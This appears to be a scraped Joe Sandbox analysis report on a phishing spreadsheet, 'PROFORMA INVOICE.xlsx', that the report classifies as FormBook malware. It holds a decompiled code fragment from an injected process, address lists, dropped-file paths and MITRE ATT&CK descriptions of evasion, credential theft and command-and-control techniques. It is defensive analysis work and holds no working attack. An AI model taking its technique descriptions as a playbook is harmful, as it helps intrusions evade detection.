							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E025F685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E025F685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E025D8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E025CDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E025FEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E025FEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x025ffcd1
0x025ffcd6
0x025ffcd9
0x025ffcdc
0x025ffcdf
0x025ffce2
0x025ffce5
0x025ffce8
0x025ffceb
0x025ffced
0x025ffced
0x025ffcf3
0x00000000
0x00000000
0x025ffcfc
0x025ffcfe
0x025ffdc1
0x0262ecbd
0x00000000
0x0262eccc
0x0262eccc
0x0262ecd2
0x00000000
0x00000000
0x0262ecdf
0x0262ece0
0x0262ece4
0x0262eceb
0x0262ecee
0x0262eca8
0x0262eca8
0x0262ecaa
0x025ffd76
0x025ffd79
0x025ffdb4
0x025ffdb5
0x025ffdb6
0x00000000
0x025ffdb6
0x025ffd7e
0x0262ecfc
0x025ffe2f
0x00000000
0x025ffe2f
0x0262ed08
0x0262ed0f
0x0262ed17
0x0262ed1b
0x00000000
0x0262ed1b
0x025ffd88
0x00000000
0x00000000
0x025ffd94
0x025ffd99
0x025ffda1
0x00000000
0x00000000
0x025ffdb0
0x00000000
0x025ffdb0
0x0262ecbd
0x025ffdc7
0x025ffdcb
0x00000000
0x025ffdd7
0x025ffde3
0x025ffe06
0x02611fe7
0x00000000
0x00000000
0x02611fef
0x02611ff0
0x02611ff4
0x02611ff7
0x02611ffa
0x02611ffd
0x02612000
0x00000000
0x00000000
0x0262ecf1
0x00000000
0x0262ecf1
0x00000000
0x025ffe06
0x025ffde8
0x025ffdec
0x025ffdef
0x025ffdf2
0x00000000
0x025ffdf2
0x025ffdcb
0x025ffd04
0x025ffd05
0x0262ec67
0x00000000
0x00000000
0x0262ec6f
0x00000000
0x0262ec6f
0x025ffd13
0x025ffd3c
0x025ffd40
0x0262ec75
0x0262ec7a
0x00000000
0x0262ec8a
0x0262ec8a
0x0262ec90
0x0262ecb2
0x025ffd73
0x025ffd73
0x00000000
0x025ffd73
0x0262ec95
0x00000000
0x00000000
0x0262eca1
0x0262eca4
0x0262eca5
0x00000000
0x0262eca5
0x0262ec7a
0x025ffd4a
0x00000000
0x025ffd6e
0x025ffd6e
0x025ffd71
0x00000000
0x025ffd71
0x025ffd4a
0x025ffd21
0x0260a3a1
0x00000000
0x0260a3a1
0x025ffd36
0x0261200b
0x02612012
0x00000000
0x00000000
0x02612018
0x00000000
0x02612018
0x00000000
0x025ffd36
0x025ffe0f
0x025ffe16
0x0260a3ad
0x00000000
0x00000000
0x0260a3b3
0x0260a3b3
0x025ffe1f
0x0262ed25
0x0262ed86
0x00000000
0x00000000
0x0262ed91
0x0262ed95
0x0262ed95
0x0262ed9a
0x0262edad
0x0262edb3
0x0262edba
0x0262edc4
0x0262edc9
0x00000000
0x0262edcc
0x0262ed2a
0x0262ed55
0x00000000
0x00000000
0x0262ed61
0x0262ed66
0x0262ed6e
0x00000000
0x00000000
0x0262ed7d
0x00000000
0x0262ed7d
0x0262ed30
0x00000000
0x00000000
0x0262ed3c
0x0262ed43
0x0262ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 025FFD94

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 4baa1391d1b90040f6def001136a2c9c9f4897c04eee926816d3b531da89bbad
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 7E91B131D0021AEBCFA5CF94C8446EEBBB4FF81308F20847AD615A7A91E7315A45CB99

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PROFORMA INVOICE.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13D6C471.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19CBAA30.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A37827C.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6731B0A7.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C335FFBE.wmf

C:\Users\user\AppData\Local\Temp\tmp7282.tmp

C:\Users\user\AppData\Local\Temp\~DF3A9718BB32954321.TMP

C:\Users\user\AppData\Local\Temp\~DF6BDEF7AB5AFB6A2C.TMP

C:\Users\user\AppData\Local\Temp\~DFB5BF52C584DCD599.TMP

C:\Users\user\AppData\Local\Temp\~DFC72BCB116CB2ED22.TMP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\80IVWTICKZQK6HB0AL5T.temp

Windows Analysis Report
PROFORMA INVOICE.xlsx

Function 03690396 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91
libraryCOMMON

Function 0369030A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146
filenetworkCOMMON

Function 03690326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137
filenetworkCOMMON

Function 036903B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
COMMON

Function 03690401 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
filenetworkCOMMON

Function 0369044B Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Function 03690462 Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Function 03690480 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre